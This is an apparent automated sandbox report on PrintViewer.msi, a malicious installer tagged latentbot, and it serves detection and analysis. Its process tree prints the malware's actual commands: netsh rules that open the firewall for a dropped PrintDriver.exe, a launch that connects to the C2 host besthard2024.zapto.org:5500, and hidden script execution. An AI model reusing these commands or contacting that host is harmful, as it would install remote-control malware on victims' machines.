Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-09-2024 05:14
Static task
static1
Behavioral task
behavioral1
Sample
PrintViewer.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PrintViewer.msi
Resource
win10v2004-20240802-en
General
-
Target
PrintViewer.msi
-
Size
6.7MB
-
MD5
85f914ec316e8d20e8e13ef3719e04e4
-
SHA1
86ec276d409525bd8c1ef6d47ec8eece7639c0a2
-
SHA256
00ceea629efd7eb1d9eee5706ce8089336259c099fc4af274baf857bd1ddf230
-
SHA512
6a9eebfd6b4e794ab1fd949fa2093559460390a1d7843484e2086145e2ae968d8c347a3b3392aab2ebc41463cf97a3d36b23b6e8f80000949bb66c8eff3ba4e6
-
SSDEEP
98304:57vB+ZHiEZJMuI9JqwLOO+lzsnMHDqqxLSd7qqXR2EkLus6elw5Xe21NtcP33h3u:5IiiJiTqwLOTsMHDHBAI8kcXvWP1u
Malware Config
Extracted
latentbot
besthard2024.zapto.org
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2408 msiexec.exe 4 2640 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1520 netsh.exe 1784 netsh.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI95EE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI98CF.tmp msiexec.exe File created C:\Windows\Installer\f769473.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9503.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI968B.tmp msiexec.exe File created C:\Windows\Installer\f769476.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI9870.tmp msiexec.exe File opened for modification C:\Windows\Installer\f769476.ipi msiexec.exe File opened for modification C:\Windows\Installer\f769473.msi msiexec.exe -
Executes dropped EXE 4 IoCs
pid Process 1556 MSI98CF.tmp 1148 PrintDrivers.exe 2308 PrintDriver.exe 2180 PrintDrivers.exe -
Loads dropped DLL 4 IoCs
pid Process 2516 MsiExec.exe 2516 MsiExec.exe 2516 MsiExec.exe 1708 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 2408 msiexec.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSI98CF.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrintDrivers.exe -
Delays execution with timeout.exe 11 IoCs
pid Process 2900 timeout.exe 2164 timeout.exe 2924 timeout.exe 2868 timeout.exe 812 timeout.exe 1224 timeout.exe 2692 timeout.exe 2016 timeout.exe 1856 timeout.exe 1936 timeout.exe 1680 timeout.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Kills process with taskkill 3 IoCs
pid Process 1984 taskkill.exe 2396 taskkill.exe 1792 taskkill.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2180 PrintDrivers.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2640 msiexec.exe 2640 msiexec.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe 1148 PrintDrivers.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2408 msiexec.exe Token: SeIncreaseQuotaPrivilege 2408 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeSecurityPrivilege 2640 msiexec.exe Token: SeCreateTokenPrivilege 2408 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2408 msiexec.exe Token: SeLockMemoryPrivilege 2408 msiexec.exe Token: SeIncreaseQuotaPrivilege 2408 msiexec.exe Token: SeMachineAccountPrivilege 2408 msiexec.exe Token: SeTcbPrivilege 2408 msiexec.exe Token: SeSecurityPrivilege 2408 msiexec.exe Token: SeTakeOwnershipPrivilege 2408 msiexec.exe Token: SeLoadDriverPrivilege 2408 msiexec.exe Token: SeSystemProfilePrivilege 2408 msiexec.exe Token: SeSystemtimePrivilege 2408 msiexec.exe Token: SeProfSingleProcessPrivilege 2408 msiexec.exe Token: SeIncBasePriorityPrivilege 2408 msiexec.exe Token: SeCreatePagefilePrivilege 2408 msiexec.exe Token: SeCreatePermanentPrivilege 2408 msiexec.exe Token: SeBackupPrivilege 2408 msiexec.exe Token: SeRestorePrivilege 2408 msiexec.exe Token: SeShutdownPrivilege 2408 msiexec.exe Token: SeDebugPrivilege 2408 msiexec.exe Token: SeAuditPrivilege 2408 msiexec.exe Token: SeSystemEnvironmentPrivilege 2408 msiexec.exe Token: SeChangeNotifyPrivilege 2408 msiexec.exe Token: SeRemoteShutdownPrivilege 2408 msiexec.exe Token: SeUndockPrivilege 2408 msiexec.exe Token: SeSyncAgentPrivilege 2408 msiexec.exe Token: SeEnableDelegationPrivilege 2408 msiexec.exe Token: SeManageVolumePrivilege 2408 msiexec.exe Token: SeImpersonatePrivilege 2408 msiexec.exe Token: SeCreateGlobalPrivilege 2408 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeRestorePrivilege 2640 msiexec.exe Token: SeTakeOwnershipPrivilege 2640 msiexec.exe Token: SeIncreaseQuotaPrivilege 1224 WMIC.exe Token: SeSecurityPrivilege 1224 WMIC.exe Token: SeTakeOwnershipPrivilege 1224 WMIC.exe Token: SeLoadDriverPrivilege 1224 WMIC.exe Token: SeSystemProfilePrivilege 1224 WMIC.exe Token: SeSystemtimePrivilege 1224 WMIC.exe Token: SeProfSingleProcessPrivilege 1224 WMIC.exe Token: SeIncBasePriorityPrivilege 1224 WMIC.exe Token: SeCreatePagefilePrivilege 1224 WMIC.exe Token: SeBackupPrivilege 1224 WMIC.exe Token: SeRestorePrivilege 1224 WMIC.exe Token: SeShutdownPrivilege 1224 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2408 msiexec.exe 2408 msiexec.exe 2308 PrintDriver.exe 2308 PrintDriver.exe 2308 PrintDriver.exe 2308 PrintDriver.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2308 PrintDriver.exe 2308 PrintDriver.exe 2308 PrintDriver.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2640 wrote to memory of 2516 2640 msiexec.exe 31 PID 2640 wrote to memory of 2516 2640 msiexec.exe 31 PID 2640 wrote to memory of 2516 2640 msiexec.exe 31 PID 2640 wrote to memory of 2516 2640 msiexec.exe 31 PID 2640 wrote to memory of 2516 2640 msiexec.exe 31 PID 2640 wrote to memory of 2516 2640 msiexec.exe 31 PID 2640 wrote to memory of 2516 2640 msiexec.exe 31 PID 2640 wrote to memory of 1556 2640 msiexec.exe 32 PID 2640 wrote to memory of 1556 2640 msiexec.exe 32 PID 2640 wrote to memory of 1556 2640 msiexec.exe 32 PID 2640 wrote to memory of 1556 2640 msiexec.exe 32 PID 2640 wrote to memory of 1556 2640 msiexec.exe 32 PID 2640 wrote to memory of 1556 2640 msiexec.exe 32 PID 2640 wrote to memory of 1556 2640 msiexec.exe 32 PID 1960 wrote to memory of 2100 1960 cmd.exe 36 PID 1960 wrote to memory of 2100 1960 cmd.exe 36 PID 1960 wrote to memory of 2100 1960 cmd.exe 36 PID 1960 wrote to memory of 480 1960 cmd.exe 37 PID 1960 wrote to memory of 480 1960 cmd.exe 37 PID 1960 wrote to memory of 480 1960 cmd.exe 37 PID 1960 wrote to memory of 780 1960 cmd.exe 38 PID 1960 wrote to memory of 780 1960 cmd.exe 38 PID 1960 wrote to memory of 780 1960 cmd.exe 38 PID 780 wrote to memory of 592 780 cmd.exe 39 PID 780 wrote to memory of 592 780 cmd.exe 39 PID 780 wrote to memory of 592 780 cmd.exe 39 PID 1960 wrote to memory of 1224 1960 cmd.exe 40 PID 1960 wrote to memory of 1224 1960 cmd.exe 40 PID 1960 wrote to memory of 1224 1960 cmd.exe 40 PID 1960 wrote to memory of 1732 1960 cmd.exe 41 PID 1960 wrote to memory of 1732 1960 cmd.exe 41 PID 1960 wrote to memory of 1732 1960 cmd.exe 41 PID 1960 wrote to memory of 2336 1960 cmd.exe 44 PID 1960 wrote to memory of 2336 1960 cmd.exe 44 PID 1960 wrote to memory of 2336 1960 cmd.exe 44 PID 1960 wrote to memory of 1708 1960 cmd.exe 45 PID 1960 wrote to memory of 1708 1960 cmd.exe 45 PID 1960 wrote to memory of 1708 1960 cmd.exe 45 PID 1708 wrote to memory of 908 1708 cmd.exe 46 PID 1708 wrote to memory of 908 1708 cmd.exe 46 PID 1708 wrote to memory of 908 1708 cmd.exe 46 PID 1708 wrote to memory of 1784 1708 cmd.exe 47 PID 1708 wrote to memory of 1784 1708 cmd.exe 47 PID 1708 wrote to memory of 1784 1708 cmd.exe 47 PID 1708 wrote to memory of 1520 1708 cmd.exe 48 PID 1708 wrote to memory of 1520 1708 cmd.exe 48 PID 1708 wrote to memory of 1520 1708 cmd.exe 48 PID 1708 wrote to memory of 2452 1708 cmd.exe 49 PID 1708 wrote to memory of 2452 1708 cmd.exe 49 PID 1708 wrote to memory of 2452 1708 cmd.exe 49 PID 1708 wrote to memory of 1444 1708 cmd.exe 50 PID 1708 wrote to memory of 1444 1708 cmd.exe 50 PID 1708 wrote to memory of 1444 1708 cmd.exe 50 PID 1708 wrote to memory of 2308 1708 cmd.exe 51 PID 1708 wrote to memory of 2308 1708 cmd.exe 51 PID 1708 wrote to memory of 2308 1708 cmd.exe 51 PID 1960 wrote to memory of 2692 1960 cmd.exe 52 PID 1960 wrote to memory of 2692 1960 cmd.exe 52 PID 1960 wrote to memory of 2692 1960 cmd.exe 52 PID 1960 wrote to memory of 1984 1960 cmd.exe 53 PID 1960 wrote to memory of 1984 1960 cmd.exe 53 PID 1960 wrote to memory of 1984 1960 cmd.exe 53 PID 1960 wrote to memory of 1936 1960 cmd.exe 54 PID 1960 wrote to memory of 1936 1960 cmd.exe 54
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\PrintViewer.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2408
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADA8D974B6F80E4224326E81035663D42⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2516
-
-
C:\Windows\Installer\MSI98CF.tmp"C:\Windows\Installer\MSI98CF.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1556
-
-
C:\Games\PrintDrivers.exe"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1148
-
C:\Windows\system32\cmd.execmd /c ""C:\Games\PrintDrivers.cmd" "1⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\mode.comMode 90,202⤵PID:2100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:592
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"2⤵PID:1732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"2⤵PID:2336
-
-
C:\Windows\system32\cmd.execmd2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\mode.comMode 90,203⤵PID:908
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1784
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1520
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline3⤵PID:2452
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"3⤵PID:1444
-
-
C:\Games\PrintDriver.exeC:\Games\PrintDriver.exe -autoreconnect ID:5654907 -connect besthard2024.zapto.org:5500 -run3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2308
-
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2692
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:1984
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:1936
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2396
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2016
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:1792
-
-
C:\Games\PrintDrivers.exeC:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2180
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Games\driverhelp.cmd" "1⤵PID:2888
-
C:\Windows\system32\mode.comMode 90,202⤵PID:2768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:2716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵PID:2720
-
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:3044
-
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2900
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2164
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2924
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1680
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2868
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:812
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1224
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1856
-
Network
-
Remote address:8.8.8.8:53Requestbesthard2024.zapto.orgIN AResponsebesthard2024.zapto.orgIN A94.156.69.75
-
1.1kB 820 B 18 16
-
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
418KB
MD53ecf294845d5ae5b8306603ba36cb2aa
SHA1859aae412a10427674364bd7858ff71ae4949292
SHA256e3fc4f644a99902e59a0365749f4fc6edd36d98069abc650db5e252edd716099
SHA512632bc982d12890539d8ac3bf6c46f8674ab57eded2e8d16d5521bf4dded360979297007aa61d4e3d9dafde76fa06bc8d361ee527c3d9276bea51e3b47c87beb8
-
Filesize
2.8MB
MD527c1c264c6fce4a5f44419f1783db8e0
SHA1e071486e4dfef3a13f958a252d7000d3ce7bfd89
SHA25629379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db
SHA512a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98
-
Filesize
1KB
MD56eb13f7936a83f4c44842029914aad6e
SHA17b9b27731d4ca6f996ce68c5d68b4d653e31d915
SHA2568d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49
SHA512227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e
-
Filesize
1KB
MD5eacc690f71a77685f030bef23b506b91
SHA103b911ba997d44028bf515ea44fe4813b4b4a785
SHA2560f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263
SHA5129870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d
-
Filesize
403KB
MD529ed7d64ce8003c0139cccb04d9af7f0
SHA18172071a639681934d3dc77189eb88a04c8bcfac
SHA256e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f
SHA5124bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415
-
Filesize
1KB
MD5b9dfbea744cc6c65473a97f2b959e44c
SHA1c022f1d97fa56d61ad935aafa4e9e59e611e746a
SHA2566f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d
SHA512b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5
-
Filesize
870B
MD5fd3b5847ddb8a31413951c0aa870ab95
SHA1e3e91e3e9fa442cd1937422120de91da87973ddb
SHA256e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad
SHA5125d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50b247832df683c0af895edaf33cd9d35
SHA121c7e24b5058f3334f40cb1c657916b57e5c0e47
SHA256e4edee729915142ab0fd4a4f9711a140fe2d40e47843043ecc39c977dd4bba49
SHA512f252c81a96ad46f449794542bddd46ffeae225465c41365b3e9ad8c98115844aa3f041795515f24ebced83b39ffa03c056a9da57a0ef2603fb0c2b7633351cbc
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
936KB
MD513056f6fc48a93c1268d690e554f4571
SHA1b83de3638e8551a315bb51703762a9820a7e0688
SHA256aeda49baf2d79da2f7a9266f1fb7884111c2620e187090321f5278af5131c996
SHA512ca828b4248e399178a8614f941332d159a30bad0156df0d5f4c4ca9d74d0ccb61fac59f34c945f5f914e22ec639bd97718f76d21b452825b07fe4041d1a44824
-
Filesize
413KB
MD5c8311ded7db427ce2c2879558ce8a8c1
SHA11895ce48297025dc005ebebc8256ac6d62013dec
SHA2566fc76509f00c8ac81b597feeab520e684d190d831d828ca318d1e54afbf4a193
SHA512d293885ef98f4e3fd9794500b8d560354cec3227916df05027f8c311076c60f11b6857e4e0ab0618f4d42da8141b42bcfb829a3a43b29a73ce0aa9967a80a232